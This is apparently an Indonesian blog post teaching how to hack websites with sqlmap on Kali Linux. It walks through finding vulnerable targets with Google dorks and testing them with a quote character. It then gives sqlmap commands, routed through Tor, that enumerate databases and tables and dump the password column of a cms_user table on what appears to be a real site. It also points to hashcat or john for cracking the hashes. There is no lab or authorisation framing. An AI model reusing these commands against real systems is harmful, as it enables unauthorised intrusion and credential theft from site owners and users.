SQLMAP USING KALI LINUX
Assalamualaikum.Wr.Wb
pada kesempatan kali ini saya akan Share Hacking website menggunakan SQLMAP di Kali Linux.
oke dahh gag usah basa-basi lagi, langsung kita ke prakteknya. jangan lupa siapkan alatnya yha ?
Alat yang dibituhkan :
1. Kali Linux
2. Dork
3. Koneksi internet
- Pertama-tama mari kita cari targetnya terlebih dahulu menggunakan Google Dork.
agan-agan bisa nyari dorknya di google.com- setelah kita mendapatkan targetnya, kita uji coba dehh dengan menggunakan tanda petik/koma.dll
apabila terjadi eror berarti itu tandanya siap untuk dieksekusi.
nanti akan terliahat erornya seperti diatas(contoh)
- kemudian kita ke aplikasi di kali linux, cari dah sqlmapnya.nanti akan muncul jendela seperti gambar dibawah ini.
- kemudian setelah itu kita ketikkan perintah
sqlmap -u http://www.example.co.uk/index.php?id=22 --dbs --tor-port=9050
[*] information_schema
[*] papercraft
kemudian lanjutkan dengan perintah berikut "sqlmap -u http://www.example.co.uk/index.php?id=22 -D papercraft --tables --tor-port=9050" ini untuk melihat tables yang berada di dalam database tersebut.
sekarang kita berada didalam database papercraft, xixixi
sekarang kalian tinggal liat aja isi dari tables yang ada dengan
perintah sebagai berikut
sqlmap -u
http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_user
--columns --tor-port=9050
dan kita akan melihat di tabel cms-user apa
aja sih isinya di tabel itu , sperti gambar berikut
horeee !!! akhirnyaaa !!!
dapat kata-kata paswordnya, setelah itu kita bisa dump dehh.
kalau masalah encryp ndecryp nya gunakan hashcat atau john nya karna
ini lama maaka ane loncatin brutforce tuu bro, wkwkwk
untuk dump database bisa gunain
sqlmap -u http://www.papercraft4u.co.uk/index.php?id=22 -D papercraft -T cms_user -C password --dump --tor-port=9050
selesai sudahh, ? gampang kan ?
0 komentar:
Posting Komentar